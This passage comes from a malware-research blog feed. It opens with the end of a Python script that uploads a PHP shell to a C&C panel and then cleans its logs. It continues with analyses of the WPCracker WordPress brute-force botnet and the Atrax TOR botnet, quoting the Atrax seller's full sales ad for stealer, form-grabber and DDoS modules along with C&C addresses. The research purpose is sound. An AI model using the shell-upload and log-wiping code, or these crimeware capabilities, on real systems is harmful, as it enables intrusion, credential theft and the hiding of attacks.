darkslateblue;">'shell.php'</span><br /> PAYLOAD &nbsp;= <span style="color: darkslateblue;">'&lt;?php phpinfo(); ?&gt;'</span><br /> <br /> uploadShell<span style="color: black;">(</span>URL, FILENAME, PAYLOAD<span style="color: black;">)</span><br /> <span style="color: #ff7700; font-weight: bold;">print</span> <span style="color: darkslateblue;">'[~] Shell created!'</span><br /> <span style="color: #ff7700; font-weight: bold;">if</span> <span style="color: #ff7700; font-weight: bold;">not</span> shellExists<span style="color: black;">(</span>URL + FILENAME<span style="color: black;">)</span>:<br /> &nbsp; &nbsp; <span style="color: #ff7700; font-weight: bold;">print</span> <span style="color: darkslateblue;">'[-]'</span>, FILENAME, <span style="color: darkslateblue;">'not found...'</span><br /> <span style="color: #ff7700; font-weight: bold;">else</span>:<br /> &nbsp; &nbsp; <span style="color: #ff7700; font-weight: bold;">print</span> <span style="color: darkslateblue;">'[+] Go to:'</span>, URL + FILENAME<br /> cleanLogs<span style="color: black;">(</span>URL<span style="color: black;">)</span><br /> <span style="color: #ff7700; font-weight: bold;">print</span> <span style="color: darkslateblue;">'[~] Logs cleaned!'</span></div> <br /> Brief, happy new year guys :)<br /> <br /> <br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4SnfOeR5GJCK-Bio042L1N_UC1DUlvfzi7pgPD5FqIO_WaKIFSivendBhNvQmWgrwK9pXDVvZmadu4fKiGQd4O7t31Ieu4GoG9whSAmS_NPt2PhX78Rz_tZCsdWji4wiK8FUl7PSEjK0/s1600/design_temari_by_e_nat-d3cmyj3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="276" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4SnfOeR5GJCK-Bio042L1N_UC1DUlvfzi7pgPD5FqIO_WaKIFSivendBhNvQmWgrwK9pXDVvZmadu4fKiGQd4O7t31Ieu4GoG9whSAmS_NPt2PhX78Rz_tZCsdWji4wiK8FUl7PSEjK0/s400/design_temari_by_e_nat-d3cmyj3.jpg" width="400" /></a></div> https://www.xylibox.com/2013/12/how-protection-of-citadel-got-cracked.htmlnoreply@blogger.com (Steven K)17tag:blogger.com,1999:blog-5365964245877416061.post-8184390894600470352Fri, 20 Dec 2013 20:44:00 +00002013-12-20T21:44:48.843+01:00BruteForce.WPNETSKY ProjectSIB ServiceTrojan.WPCracker.1WPCracker.1DrWeb released a <a href="http://translate.google.com/translate?sl=ru&amp;tl=en&amp;u=http://news.drweb.com/?i=3811">news</a> about this malware in August, they know it as 'Trojan.WPCracker.1'<br /> And more recently ~ <a href="https://www.virustotal.com/en/file/a821b1c35c9c290b1759d6e8151bf95efdd13168146887f840d3d3f11d94411b/analysis/1386340092/">1e8cd0f0f1702820c870302520bc0176</a>.<br /> <br /> This executable communicate with a C&amp;C at dorblu99.net<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhba5AHWCiGu093SXDO_TV8hw0FYYJkFfJONM-_oSZ0Yzdt6rtcUYef_fi-nwFcPKfCZdtWZrovMKWTSr_c56p_0nSP1vu55R-aPUjS8eofwT3w_VYV2LIvp7EAESJmYGYrZf8Dd_E_nO4/s1600/06-12-2013+15-33-39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhba5AHWCiGu093SXDO_TV8hw0FYYJkFfJONM-_oSZ0Yzdt6rtcUYef_fi-nwFcPKfCZdtWZrovMKWTSr_c56p_0nSP1vu55R-aPUjS8eofwT3w_VYV2LIvp7EAESJmYGYrZf8Dd_E_nO4/s400/06-12-2013+15-33-39.png" width="400" /></a></div> Let's have a closer look.<br /> <br /> Login:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPJnB0Xqw7pPO-LRnfGxA2Ahe1WCWkFld1iS4HsyKOj_WWWNqQ2ou-j7JQ6sZJEZ-fFtCwVAq4qzVWLnXKeurvtyv1EXwXggxoAkM_5Kx2aUecyyTsnaYJQJjiE-Xms067mrxjZDiVPSk/s1600/29-11-2013+10-20-43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPJnB0Xqw7pPO-LRnfGxA2Ahe1WCWkFld1iS4HsyKOj_WWWNqQ2ou-j7JQ6sZJEZ-fFtCwVAq4qzVWLnXKeurvtyv1EXwXggxoAkM_5Kx2aUecyyTsnaYJQJjiE-Xms067mrxjZDiVPSk/s1600/29-11-2013+10-20-43.png" /></a></div> <br /> Main:<br /> <div class="separator" style="clear: both; text-align: center;"> </div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_lEdzFDmgzoz8pzbFPSTtGDNqHh82WE0mfKqEqKmJCbjF0Fy_JN8GqpVSSs4sZ8GmYIHgXNWlM3pudxaJbmzORhIxYx36YVG4y3s5J2SnhM6Yi52WWCFgsd4MRoiF_krLbG0Iav7ipCU/s1600/29-11-2013+10-23-31.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_lEdzFDmgzoz8pzbFPSTtGDNqHh82WE0mfKqEqKmJCbjF0Fy_JN8GqpVSSs4sZ8GmYIHgXNWlM3pudxaJbmzORhIxYx36YVG4y3s5J2SnhM6Yi52WWCFgsd4MRoiF_krLbG0Iav7ipCU/s400/29-11-2013+10-23-31.png" width="317" /></a></div> <br /> Bot info:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxsZoKbtZ58S8gTFaVsicO0DZ1InXdP0So51gPbLQ96H28IsUs1hkEXZKO9zGh959tPJNaQtTIw7UA2Cfk0_jv8xV2mg9LiYiUgRDfXMd6yRSvzjGbzIlnpSSbhkRhE2UMu95X9rESJ-w/s1600/29-11-2013+10-52-04.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="145" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxsZoKbtZ58S8gTFaVsicO0DZ1InXdP0So51gPbLQ96H28IsUs1hkEXZKO9zGh959tPJNaQtTIw7UA2Cfk0_jv8xV2mg9LiYiUgRDfXMd6yRSvzjGbzIlnpSSbhkRhE2UMu95X9rESJ-w/s400/29-11-2013+10-52-04.png" width="400" /></a></div> <br /> Broken wordpress:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvRdSzz81Iyp3hlBtRkTSOVOzeYEAQHfkN65a_WoMTAcMavsHmUOi-ANyDsB3ad_0Acn5QSD3jkodgxpzeVFwtONHUwrp_g7PpsDIjcCYpU6OWStwFKXyBkQ-cvm0LS_JAGXY69qXB5bk/s1600/29-11-2013+10-46-23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvRdSzz81Iyp3hlBtRkTSOVOzeYEAQHfkN65a_WoMTAcMavsHmUOi-ANyDsB3ad_0Acn5QSD3jkodgxpzeVFwtONHUwrp_g7PpsDIjcCYpU6OWStwFKXyBkQ-cvm0LS_JAGXY69qXB5bk/s400/29-11-2013+10-46-23.png" width="400" /></a></div> <br /> Statistics:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVidi5veGZJZeSVLVLh2CfSkqW4pBZbEqxsYYkJFcCtQ14__jcfaO9UesntYYq5HKbQlwiU_V0rXJxLc2pOG01ZVR2YVSRTJvNxBpZW0VEoY0k3t6T4KAGNnqciFWE4NV0P8x3Xo6u9I0/s1600/29-11-2013+10-33-41.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVidi5veGZJZeSVLVLh2CfSkqW4pBZbEqxsYYkJFcCtQ14__jcfaO9UesntYYq5HKbQlwiU_V0rXJxLc2pOG01ZVR2YVSRTJvNxBpZW0VEoY0k3t6T4KAGNnqciFWE4NV0P8x3Xo6u9I0/s400/29-11-2013+10-33-41.png" width="400" /></a></div> <br /> Add domains:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEm13Udez7ORKpxEOa94uCUrByigjJCt7YX2d1DtLni1bESkjA9xe8sEjJtQ2qIslSqLT88rnK-zSH9-bGXZOR64hF3P9ogVqFPCuD5iK6i1yq9le_MHCmQxIMUt0UgqIEqqd7ZUYTbUY/s1600/29-11-2013+10-29-50.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="145" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEm13Udez7ORKpxEOa94uCUrByigjJCt7YX2d1DtLni1bESkjA9xe8sEjJtQ2qIslSqLT88rnK-zSH9-bGXZOR64hF3P9ogVqFPCuD5iK6i1yq9le_MHCmQxIMUt0UgqIEqqd7ZUYTbUY/s400/29-11-2013+10-29-50.png" width="400" /></a></div> <br /> Add admin panels:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl1iqpkeH_WqNBbPdNmd4mU9y6fcZvgGZAIXyToZC9BD5TGzicwQaENMG5qlNExWKIZFat_v11X8GLuCGOH8ARMdty66pGIeKjpqXo0wZd39k_THMO3EV_vVy1eCHcRA1sN3b147ZT9gs/s1600/29-11-2013+10-38-33.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="137" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl1iqpkeH_WqNBbPdNmd4mU9y6fcZvgGZAIXyToZC9BD5TGzicwQaENMG5qlNExWKIZFat_v11X8GLuCGOH8ARMdty66pGIeKjpqXo0wZd39k_THMO3EV_vVy1eCHcRA1sN3b147ZT9gs/s400/29-11-2013+10-38-33.png" width="400" /></a></div> <br /> Add logins:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0vaTJWUH5NEQkpYNOQ6YEpyWXSAGfZ8GBDPe9G9pFjPpVFKSSalbIjf4-17Fn2W-zgelOpFzNb6nwevojoiVF5Vhxz5dUrc8NzqW6W75qwvACiwQrRqkpG2_7c5WfqfII0BRgU3UWIio/s1600/29-11-2013+10-39-46.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="137" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0vaTJWUH5NEQkpYNOQ6YEpyWXSAGfZ8GBDPe9G9pFjPpVFKSSalbIjf4-17Fn2W-zgelOpFzNb6nwevojoiVF5Vhxz5dUrc8NzqW6W75qwvACiwQrRqkpG2_7c5WfqfII0BRgU3UWIio/s400/29-11-2013+10-39-46.png" width="400" /></a></div> <br /> Add passwords:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh88LiRBpS6M3cjg5VUF_8mQEqMxSeY1vjvicYUk7dyoGRe0eNGq7o4fbCMjt5ywzAFzb6cTRAMULflcNcB6OtFM1iACMN4niwa13FzCMQ7P6LEZWrUPMXrZMYP15KVndZUJOnCkLekBIc/s1600/29-11-2013+10-40-30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="137" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh88LiRBpS6M3cjg5VUF_8mQEqMxSeY1vjvicYUk7dyoGRe0eNGq7o4fbCMjt5ywzAFzb6cTRAMULflcNcB6OtFM1iACMN4niwa13FzCMQ7P6LEZWrUPMXrZMYP15KVndZUJOnCkLekBIc/s400/29-11-2013+10-40-30.png" width="400" /></a></div> <br /> Add module for jm(zip):<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcg9M9AyScL1cRIRRrF3PkO46UvyXziYTMT0vaaPPsf-U_Wb6VUIHoNwN5NY5gFUWJqxWL2qi0f2LzhzqffDNW7p_OvcwUcD6jxTpA3zmWLhago_ks8UT6XwwiLnCKdVFFKXqXUAfTY0I/s1600/29-11-2013+10-43-49.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="137" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcg9M9AyScL1cRIRRrF3PkO46UvyXziYTMT0vaaPPsf-U_Wb6VUIHoNwN5NY5gFUWJqxWL2qi0f2LzhzqffDNW7p_OvcwUcD6jxTpA3zmWLhago_ks8UT6XwwiLnCKdVFFKXqXUAfTY0I/s400/29-11-2013+10-43-49.png" width="400" /></a></div> <br /> Add module for wp(zip):<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc7MNzu7ZN6e7n8J3UQvGTWAlrWF_mMIstFyMJjva5vFeyJolgTMIbLcPnsMWWdmU77KQ2cnjc8cED632lodHBW01uOMakha5FavNx-ONCAnUao8tC5XhQ59hm-llp2rAvB9St4ZgZ7uw/s1600/29-11-2013+10-44-35.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="137" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc7MNzu7ZN6e7n8J3UQvGTWAlrWF_mMIstFyMJjva5vFeyJolgTMIbLcPnsMWWdmU77KQ2cnjc8cED632lodHBW01uOMakha5FavNx-ONCAnUao8tC5XhQ59hm-llp2rAvB9St4ZgZ7uw/s400/29-11-2013+10-44-35.png" width="400" /></a></div> <br /> Add shell jm(php):<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0pkN8sbnAuz-C8JCH1_0GIwGaAasoPlnyUZ1DmsAiHazi9mRSqm0X9nlooe_VrXBewi2ubU0X2-rXNMOZaoq_plhqc3rNyJGYclO741iOilY7mq7tAulZysOg0cBS4JjrVS2BM2qry7A/s1600/29-11-2013+10-45-21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="137" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0pkN8sbnAuz-C8JCH1_0GIwGaAasoPlnyUZ1DmsAiHazi9mRSqm0X9nlooe_VrXBewi2ubU0X2-rXNMOZaoq_plhqc3rNyJGYclO741iOilY7mq7tAulZysOg0cBS4JjrVS2BM2qry7A/s400/29-11-2013+10-45-21.png" width="400" /></a></div> <br /> Cron brute:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD9O_7oT4XiBVNKUe2DpSXgseTqoSZASpN-MHpSKeZFMCdwoCcDKtgw1FNXparWBSqOIsiA2OkC4m4BOZQdOuG7Ut-DkYpq60QurbsucGUBd8Il8EhZQm_yivc4m0OD1BwOMYJXF8cZF0/s1600/29-11-2013+10-31-31.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD9O_7oT4XiBVNKUe2DpSXgseTqoSZASpN-MHpSKeZFMCdwoCcDKtgw1FNXparWBSqOIsiA2OkC4m4BOZQdOuG7Ut-DkYpq60QurbsucGUBd8Il8EhZQm_yivc4m0OD1BwOMYJXF8cZF0/s1600/29-11-2013+10-31-31.png" /></a></div> <br /> Ban list:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhheHjdF0PmMVqgD8wyboHt0XFFPXlC485cmpyclOMK7Cqzkygy7evsPZ7cFAVH4QEqOJFH8FNBNipX4lzBf0nyLbBSqTPKEGkvL3GCW-lKxFunFTEzT6l35cGJwVjIGIlWGARZ7FqxY8k/s1600/29-11-2013+10-59-22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhheHjdF0PmMVqgD8wyboHt0XFFPXlC485cmpyclOMK7Cqzkygy7evsPZ7cFAVH4QEqOJFH8FNBNipX4lzBf0nyLbBSqTPKEGkvL3GCW-lKxFunFTEzT6l35cGJwVjIGIlWGARZ7FqxY8k/s1600/29-11-2013+10-59-22.png" /></a></div> <br /> Logs:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEje9VrxYBXe6mA2RxLa2GALJkBegFaBnjLco-IzJL45AdkVm2OMLhrDxfijQvfGD1BKcmRMSnqY_EPEOtfMwYWV_0ve1zTmVjUSskHx3RNjKPCktPBQGfOVAwm4s0jm0QABhLnkfVWqqdU/s1600/29-11-2013+10-59-14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="161" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEje9VrxYBXe6mA2RxLa2GALJkBegFaBnjLco-IzJL45AdkVm2OMLhrDxfijQvfGD1BKcmRMSnqY_EPEOtfMwYWV_0ve1zTmVjUSskHx3RNjKPCktPBQGfOVAwm4s0jm0QABhLnkfVWqqdU/s400/29-11-2013+10-59-14.png" width="400" /></a></div> <br /> Domains list (downloaded by the malware to know wich wordpress he should brute force):<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg91z1azin6oHbP0r6LPmGW2Jkb2qWGhyCd7TPopjG450LsUGrTVX6PrzhEST2Gxz-QcicdZeOHwNfO88djFfUt-StfYBDVjlzs9oZOCm8_oAvRnXDJ5WEfUFVr-GLFu0xpfUrw356MvLE/s1600/29-11-2013+12-06-51.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg91z1azin6oHbP0r6LPmGW2Jkb2qWGhyCd7TPopjG450LsUGrTVX6PrzhEST2Gxz-QcicdZeOHwNfO88djFfUt-StfYBDVjlzs9oZOCm8_oAvRnXDJ5WEfUFVr-GLFu0xpfUrw356MvLE/s400/29-11-2013+12-06-51.png" width="400" /></a></div> 36k urls.<br /> <br /> Roman of abuse.ch have also wrote an <a href="http://www.abuse.ch/?p=5813">interesting post</a> about this threat.https://www.xylibox.com/2013/12/win32bruteforcewp.htmlnoreply@blogger.com (Steven K)7tag:blogger.com,1999:blog-5365964245877416061.post-4957210004222454637Fri, 06 Dec 2013 19:03:00 +00002013-12-07T12:42:13.694+01:00AtraxAtrax BotnetTORTOR BotnetWin32/Atrax.AAtrax is a TOR botnet, you can read about it on the <a href="http://www.welivesecurity.com/2013/07/24/the-rise-of-tor-based-botnets/">excellent post</a> of Aleksandr.<br /> Someone on kernelmode.info posted recently a fresh sample:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBHg4b43TgJY4MUbfXN2W49jworAMSYm2Nlv4BdGoTvRqeA5uTyJWgtoOYjaiL4bSonjZiilsvogG4bHjCuqXbmDo5iCy_bGvWOszI4PPfgCQm3JkWFmCxDAipdahoZFKVGudoeMaoYgc/s1600/06-12-2013+18-07-59.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="123" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBHg4b43TgJY4MUbfXN2W49jworAMSYm2Nlv4BdGoTvRqeA5uTyJWgtoOYjaiL4bSonjZiilsvogG4bHjCuqXbmDo5iCy_bGvWOszI4PPfgCQm3JkWFmCxDAipdahoZFKVGudoeMaoYgc/s400/06-12-2013+18-07-59.png" width="400" /></a></div> MD5: <a href="https://www.virustotal.com/en/file/9b8cdbd216044d13413efee6c20c5da080da30a9aacabeeeb5cea66e96104645/analysis/1386353583/">44a6a7d4a039f7cc2db6e85601f6d8c1</a><br /> <br /> Fun things also, the coder leaved a message:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNncSfDyWj-GgS8Bi60Ij9DvRD9VsW9hviGQFDaS8pPopHPdbFl1fFenDiFj8MNwaA_WCmiYqcMHME-dnzcWPtnAJlnDhSaWOBYp0OaTJAzLe2B3zRqYASfITVmivlGFKZhz8mvI3lp7M/s1600/06-12-2013+18-15-35.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="72" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNncSfDyWj-GgS8Bi60Ij9DvRD9VsW9hviGQFDaS8pPopHPdbFl1fFenDiFj8MNwaA_WCmiYqcMHME-dnzcWPtnAJlnDhSaWOBYp0OaTJAzLe2B3zRqYASfITVmivlGFKZhz8mvI3lp7M/s400/06-12-2013+18-15-35.png" width="400" /></a></div> "Nice blog post ESET 2013/07/24 Greetz to KernelMode.info"<br /> <br /> Atrax advertising:<br /> <div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"> Programming language: C (No C++!)<br /> OS: Win XP - 8.1 (all x86/x64)<br /> Admin rights required: No<br /> Special: Tor Integration, spawns no process -&gt; x64/x86 Process injection, this is the first public bot which supports windows 8!<br /> File size: ~1,2 MB (because of Tor integration and x64/x86 Code), you can get a free assembler web downloader ~2KB<br /> <br /> Why Tor?<br /> The bot communicates only via Tor with your panel. With Tor you can get a really nice anonymous Botnet. It is almost impossible (well, theoretically it is possible, but Silkroad is still online, so don’t worry) to get your server ip and put your server down. You get a Tor onion domain and this domain cannot be blacklisted (lasts “forever”). So to sum up: If you don’t do any configuration mistakes, your botnet will probably last very long.<br /> You need a VPS or a dedicated server to host this tor botnet, because you need to set up a hidden service. Because of tor the botnet is consuming more hardware resources than typical botnets. Probably it is not possible to get a 10 Dollar/year VPS and trying to host over 1k victims.<br /> <br /> Setting up hidden service instructions:<br /> - https://www.torproject.org/docs/tor-hidden-service.html.en<br /> - http://kendildonic.wordpress.com/2011/08/03/build-a-tor-hidden-service-onion-web-site-with-a-cheap-vps/<br /> - A little manual to set it up on debian based linux systems is included<br /> <br /> The bot consist of a core and various plugins/addons. Each plugin/addon costs some money. Every plugin also communicates over tor.<br /> (If somebody is interested in developing a plugin -&gt; contact me)<br /> <br /> Some basic features:<br /> - Autostart, Persistence<br /> - x86/x64 Code, x86/x64 Injection with Heavens Gate technique<br /> - Anti-Analyzer (Protection against e.g. anubis.iseclab.org, malwr.com)<br /> - If you need: Anti-VM (Please request it explicitly)<br /> - Anti-Debug/Anti-Hook Engine<br /> - Doesn't use suspicious windows apis like GetProcAddress/GetModuleHandle<br /> - Plugins are saved to disk with AES-128-CBC encryption (random key)<br /> - Communication over tor is already encrypted, so no extra communication encryption<br /> - Every Plugin and the core is watermarked. Leak -&gt; No updates/support. (All updates are free)<br /> - Everything UNICODE<br /> <br /> Panel:<br /> - http://www0.xup.in/exec/ximg.php?fid=11907674<br /> - http://www0.xup.in/exec/ximg.php?fid=68935688<br /> - http://www0.xup.in/exec/ximg.php?fid=20127007<br /> - http://pixs.ru/showimage/2ci7png_4898170_9693543.png<br /> - http://pixs.ru/showimage/ekahjpg_4965220_9693535.jpg<br /> - Login Bruteforce protection, panel will be locked after x failed logins (captchas are not secure)<br /> - SQL-Injection proof<br /> - No IonCube<br /> <br /> Standard Features:<br /> - Kill<br /> - Update<br /> - Download (over Tor), Execute (Commandline-Parameter allowed)<br /> - Download (over Tor), Execute (Commandline-Parameter allowed) in memory (Your file doesn't need to be FUD)<br /> - Install Plugin<br /> - Installation List (A list with all installed applications)<br /> <br /> The Core has only a few functions, but they are already pretty useful. Yes you can e.g. start your own uncrypted Bitcoin Miner with the "Download over Tor, Execute Memory" function.<br /> I will give you a plain bitcoin miner exe or just use the binaries you can find in this board.<br /> <br /> A bot addon is integrated in the main EXE, so no extra file.<br /> A bot plugin is not integrated, you will receive extra file(s).<br /> <br /> Addon - DDOS:<br /> - Full IPv6 ´+ IPv4 support.<br /> - UDP Flood<br /> - TCP Flood<br /> - TCP Connect Flood (Some idiots call this "SYN-Flood")<br /> - HTTP Slowloris (based on http://ckers.org/slowloris/)<br /> - HTTP RUDY (R-U-Dead-Yet, based on https://code.google.com/p/r-u-dead-yet/)<br /> - HTTP File Download (Good if your target hosts a file &gt;1MB)<br /> - If you need some more methods, contact me.<br /> <br /> Addon - Form Grabber:<br /> - Firefox, Internet Explorer x86/x64, Chrome SSL HTTP POST Grabber<br /> - Anti-Hook Engine (Removes hooks from other bots)<br /> - Own Hook Engine (No copy/paste crap)<br /> - Tested with Browser: Internet Explorer v7/v9/v10, Firefox v11/v21/v22/v24, Chrome v27/v30<br /> - Tested with Website: PayPal, Amazon, Bitcoin.de, Mt. Gox, eBay, Googlemail, vBulletin Boards<br /> - SPDY v3 support<br /> - IE 7/8/9/10 (Enhanced) Protected Mode Support<br /> - Grabs only important POST Form Requests.<br /> - Searches automatically for Username/Password/Email and CC (Possible CC will be displayed in panel)<br /> - Screenshot: http://www0.xup.in/exec/ximg.php?fid=24471254<br /> <br /> Addon - Socks 5 Reverse Socks:<br /> - You need a 2nd VPS/dedicated Server to keep your main C&amp;C server secure!<br /> - Server is a Java application to achieve complete platform independence -&gt; All OS supported!<br /> - Socks 5 with and without authentication<br /> - Controlled via tasks<br /> - You can run different instances of the proxy sever for different purposes<br /> - Works on all clients because it is a reverse socks (No SSH crap!)<br /> - Panel screenshot: http://www0.xup.in/exec/ximg.php?fid=15537396<br /> <br /> Plugin - Stealer:<br /> - Steals all current browser versions.<br /> - Steals: CHROME, FIREFOX, SAFARI, INTERNET EXPLORER, OPERA, FILEZILLA, PIDGIN, JDOWNLOADER v1 + v2, GIGATRIBE, THUNDERBIRD, WINDOWSKEY, FLASHFXP, ICQ, MSN, WINDOWS LIVE, OUTLOOK, PALTALK, STEAM Username Only, TRILLIAN, MINECRAFT, DYNDNS, SMARTFTP, WSFTP, Bitcoin Wallet (Armory, Bitcoin-Qt, Electrum, Multibit)<br /> - If you need something more -&gt; ask me.<br /> - Special: JDownloader v1/v2, Bitcoin Wallet Stealer (whole wallet.dat will be uploaded), IE10 + IE11 support!<br /> <br /> Plugin - Coin Mining (Experimental)<br /> - Bitcoin / Litecoin Miner<br /> - Hash Rate displayed in panel<br /> - Based on Ufasoft Miner v0.68 (updated regularly)<br /> - Mining with tasks http://www0.xup.in/exec/ximg.php?fid=60729560<br /> <br /> Price:<br /> Core: $250 (Launch price! Read information below)<br /> Addon DDOS: $90<br /> Addon Form Grabber: $300<br /> Addon Reverse Socks: $400<br /> Plugin Stealer: $110<br /> Plugin Coin Mining: $140 (Experimental)<br /> <br /> Payment only with Bitcoin. Market price from https://www.bitcoin.de "Current Bitcoin price" - 10%, because of high exchange rate fluctuations!<br /> Bugfix Updates and Support is free of course.<br /> Please keep in mind: This Core Price will be higher soon. This Bot is currently in beta stage, so probably there are still some bugs. Get it now pay less + maybe bugs, wait: pay more and bot is stable<br /> <br /> - Builder available?<br /> No, your tor domain will last forever if you don't lose the RSA key.<br /> <br /> - Is the bot bin FUD?<br /> No, you need a crypter. This bot should work with all crypters, but .NET Crypters are special. Tell me what .NET crypter you want to use and we will see.<br /> I can give you a free .NET Crypter to get you started!<br /> <br /> - The bot is too expensive, noob!<br /> I don't care if you think it is too expensive.<br /> <br /> - The filesize sucks, noob!<br /> I don't care.</div> <br /> Alright, let's have a look on the C&amp;C of the sample posted on kernelmode.<br /> <div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"> estrgnejb7sjly7p.onion &gt;&gt; 46.183.219.xxx</div> The httpd is not properly configured to run with the IP<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbL9eo8Qscd55m21hCJp3M4qsTwdoyFkPH5_SadPYe5OSON_llx0jAkUttIrzhVCeRFo-dc5gHlbwyJ_-pykRrD8P3bvZirBcHnXr6_XrWPHGR3C6vD4bxSQ_Xt1i_8UvkMuIyheAnMiU/s1600/07-12-2013+00-48-24.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbL9eo8Qscd55m21hCJp3M4qsTwdoyFkPH5_SadPYe5OSON_llx0jAkUttIrzhVCeRFo-dc5gHlbwyJ_-pykRrD8P3bvZirBcHnXr6_XrWPHGR3C6vD4bxSQ_Xt1i_8UvkMuIyheAnMiU/s400/07-12-2013+00-48-24.png" width="371" /></a></div> So, let's have a look from TOR.<br /> <br /> Login:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYG9G1Ar5KdrebxYyApNqBCeqY28TrsadSBrkZ8IGSu_ZeSRifFvbH4VV7Q2jXtgYpSUazjCxLuDPwL44ftTqmeI3lq0CabV8usIy_haqCEbQ26Y3TLQsW2wsm-F_Y9yWXYDQME9TErfQ/s1600/06-12-2013+17-18-10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="177" 